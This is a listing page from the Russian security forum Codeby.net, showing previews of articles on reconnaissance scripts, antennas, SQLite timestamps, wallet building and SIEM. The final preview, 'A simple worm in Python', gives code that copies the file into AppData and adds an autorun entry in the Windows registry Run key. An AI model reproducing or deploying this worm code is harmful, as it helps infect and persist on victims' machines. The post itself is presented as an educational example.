Форум информационной безопасности - Codeby.net

Soft Signotrack и небольшая разведка.

  • 3 293
  • 2
cignotrack1.png
Добрый день,Уважаемые Форумчане и Друзья.

На расслаблении сегодня решил запилить этот пост (а там посмотрим,до позднего вечера времени много).
Может ещё чего вам покажу .

Данный скрипт предназначен для лёгкой разведки.
Он относится к проверке ресурса (домена даже скорее всего) на конфиденциальность и утечку данных.
В работе достаточно прост.Ничем таким тяжёлым он не обременяет тестируемые ресурсы.

Ищет документы,фото-файлы,ссылки,почту и делает анализ на содержание в этих файлах метаданных(кроме почты,естественно).
Написан скрипт автором Cignoraptor-ita из Италии.
Но,тем не менее,автор специализируется на исследованиях в области социальной инженерии, судебной экспертизы.
И занимается контрразведкой с анонимностью.

Итальянские представители pentest ,насколько знаю,ещё не были представлены на нашем ресурсе.
Ну вот,Ребята,встречаем.Новый скрипт,надо отдать должное,что вовсе и неплохой.
Есть конечно frameworks,которые могут достойно и заменить и включают в...

Статья Антенны и антенно-фидерное хозяйство - 4

  • 2 749
  • 1
Доброго здравия соратники!

В предыдущих частях я немного коснулся устройства, характеристик и принципов работы антенн. Но рассказ был бы неполным без упоминания о фидере.
Итак, Фидер! Слово фидер происходит от английского слова feed - питать.
Фидер - это электрическая цепь или вспомогательное устройство, с помощью которых радиочастотный сигнал попадает от передатчика в антенну или от антенны к приёмнику.
В зависимости от частоты источника сигнала применяют различные конструкции фидеров:
1) на частотах до 3 Мгц в основном применяют проводные фидеры, или витые пары.
2) на частотах от 3 Мгц до 3 Ггц применяют коаксиальный кабель.
3) от 3 Ггц до 300 Ггц - металлические и диэлектрические волноводы.

Но самые распространённые, это коаксиальные кабели. О них и хотелось бы поговорить.
Коаксиальный кабель - это кабель, состоящий из центрального проводника, вокруг которого, по всей длине расположена оплётка.

ф2.jpg
...

Конкурс Объявляю конкурс до 17 октября на лучшую статью по теме "Развертывание и администрирование инфраструктуры для моделирования комплексных атак"

  • 3 748
  • 11
P

orig-15200012219dc7ad413a118ddf2e75f9d6a17dd331.jpeg

Уважаемые пользователи форума,

В честь открытия нашего нового сервиса Консультации Codeby, мы объявляем конкурс на лучшую статью по теме "Развертывание и администрирование инфраструктуры для моделирования комплексных атак" до 17 октября 2018. Автор лучшей статьи получает бесплатно консультацию у Инструктора сервиса Codeby Consult @Underwood длительностью 60 минут. Победитель конкурса сможет оценить уникальные возможности нового сервиса.

Основные направления специализации Underwood:

- Проектирование и развертывание удаленной инфраструктуры для моделирования комплексных атак
- Управление, мониторинг и администрирование сегментов атакующей инфраструктуры
- Методики защиты, сокрытия и усложнения идентификации трафика сегментов атакующей инфраструктуры

Конкурс:

1) Написать статью не менее 500 слов на тему...

Статья Преобразование в читабельный вид Даты Времени в БД SQLite (Web Browser)

  • 5 609
  • 2
Всем привет! В процессе работы с БД SQLite в таблицах Дата и Время хранится с типом данных integet:
4.jpg
3.jpg
Для преобразования Даты и времени в БД History(Opera) используем следующий код SQL в программе DB Browser for SQLite:
SQL:
SELECT datetime(last_visit_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch','localtime') AS [Дата],
    url AS [URL], title AS [Сайт], visit_count AS [Количество посещений]
FROM urls
ORDER BY last_visit_time DESC
1.jpg
Значение в ячейке last_visit_time – это дата и время, которая хранится в 17 символах и исчисление идёт с 01.01.1601, поэтому для её преобразования потребуется нехитрая конструкция:
SQL:
datetime(last_visit_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch','localtime')
...

Статья Сборка кошельков криптовалют на Linux - алгоритм Neoscrypt

  • 182
  • 2
Всем привет!

Для начала выясним а зачем вообще уметь собирать кошельки?
Можно просто изменить цветовое оформление и иконки, собрать кошель и радоваться индивидуальному дизайну. Но это самое малое что можно сделать. Также можно было собрать свой форк (копию) монеты и выйти на рынок. Ну или поюзать эксплойт например )))

В сети на эту тему информации чуть больше нуля, а та что есть нерабочая.

Для примера соберём кошелёк Innova, просто у меня об этой монетке хорошие воспоминания. За 3 недели *** к деревянных поднял и вывел на хайпе.

Собирать будем на ubuntu 16.04, можно пользоваться и виртуалкой. Во избежание проблем рекомендую пользоваться чистой сборкой.

Приступим:

Запустим терминал и обновим пакеты
sudo apt-get update && sudo apt-get full-upgrade

Заходим на innovacoin/innova смотрим справку, изучаем зависимости. Не всегда они все там могут быть указаны.

Ставим зависимости

sudo apt-get install -y...

Статья Антенны и антенно-фидерное хозяйство - 3

  • 4 220
  • 4
Доброго здравия!

Продолжим знакомиться с антеннами?

Есть несколько основных типов антенн.

1) Симметричный полуволновой вибратор (диполь)

т2.png

Это самая простая в изготовлении антенна.

т1.gif

А вот так выглядит её диаграмма направленности в плоскости вибратора. А в перпендикулярной вибратору плоскости, диаграмма представляет собой окружность.
Настройка диполя сводится к определению точки подключения фидера. Поскольку фидеры имеют разное волновое сопротивление, а импеданс антенны различен по всей длинне, то антенну нужно согласовать с фидером путём расчёта точки подключения или установкой согласующего устройства. И второй этап настройки, установка резонансной частоты антенны путём коррекции длин плеч вибратора.
Симметричный полуволновой вибратор имеет много модификаций: разрезной вибратор, шунтовый вибратор, петлевой вибратор, Inverted-V, уголковая антенна, и много других.

2) Несимметричный...

Статья Откровенное интервью с хакером. Пентесты и как взломать банкомат. Хакерская школа.

  • 18 891
  • 152
V
Во втором выпуске Люди PRO – хакер в маске. Раскрываем хакерские секреты и как от них защититься, говорим о том, чем хакинг отличается от кардинга, кто такие кардеры и почему хакеры считаются элитой киберпреступного мира, где купить оборудование для хакерского взлома и во сколько это обойдется, за что отвечает каждый элемент компьютера хакера, как взломать банкомат, как взломать Wi-FI, что из себя представляет нашумевшая группировка хакеров Анонимус (Anonimous), как защитить свой сайт от хакеров, почему российские власти хотят заблокировать Телеграмм, о DDoS-атаках и многом другом.

Статья Антенны и антенно-фидерное хозяйство -1

  • 5 372
  • 11
Доброго здравия коллеги!

На форуме много качественного и исчерпывающего материала по всем направлениям IT сферы. Но есть обойдённая вниманием тема: Антенны и антенно-фидерное хозяйство.

Можно конечно сказать: - Нафига нам влазить в эти дебри? Поставил крутую и дорогую антенну и она пробьёт до любой Wi-Fi точки. Если не знать как правильно работает эта «крутая» антенна и как правильно ей пользоваться, никуда она не добьёт, а будет греть лишь воздух вокруг себя. Ибо в Wi-Fi применяется частота от 2,4 Ггц до 2,5 Ггц, а в СВЧ-печах (микроволновках) — 2,45Ггц.
Но хочу я, всё же, начать не с антенн, а с небольшой теории распространения радиоволн.

Я не стану расписывать здесь расчёты формул электродинамики Максвелла или о работах Фарадея над открытием электромагнитных волн. А хочу напомнить лишь что такое радиоволны.

1.gif


Радиоволна — это электромагнитные волны, распространяемые в окружающем пространстве. К радиоволнам относятся электромагнитные волны с...

Статья Управление информацией по вопросам безопасности и менеджмент событий безопасности (Security Information and Event Management (SIEM))

  • 2 434
  • 0
Продукты программного обеспечения и службы SIEM объединяют ( (SIM)) и менеджмент событий безопасности ((security event management)SEM). Они предоставляют анализ предупреждений о безопасности в режиме реального времени, создаваемых сетевым оборудованием и приложениями.

Поставщики продают SIEM в качестве программного обеспечения, в качестве устройств или в качестве управляемых служб; эти продукты также используются для регистрации данных безопасности и создания отчетов в целях согласования.

Несмотря на то, что индустрия решила использовать термин ‘ ’ в качестве всеобъемлющего термина для этого...

Статья Простой червь на python

  • 15 732
  • 10
Всем доброго времени суток, участники Codeby!
Перед шарагой нечего было делать, настрочил простенький червь на питоне, что бы он
послужил вам примером/неким представлением "тёмной" области этого языка.

Добавим наш заражённый файл в какую-нибудь папку, где он не будет мозолить
пользователю глаза, я долго думать не стал, т.к это всего лишь пример и добавил его в
папку AppData.

Python:
directory = os.getenv("APPDATA") + r'/your_program/'
base_file = directory + os.path.basename(__file__)

if not os.path.exists(directory):
    os.makedirs(directory)
    shutil.copy(__file__, base_file)

Первым делом я решил закрепить наш файл в автозапуске операционной системе,
делал я это через реестр.Тут нам поможет модуль winreg.

Python:
path_to_reestr = OpenKey(HKEY_CURRENT_USER,
                        r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                        0, KEY_ALL_ACCESS)
SetValueEx(path_to_reestr, 'Virus', 0, REG_SZ, base_file)...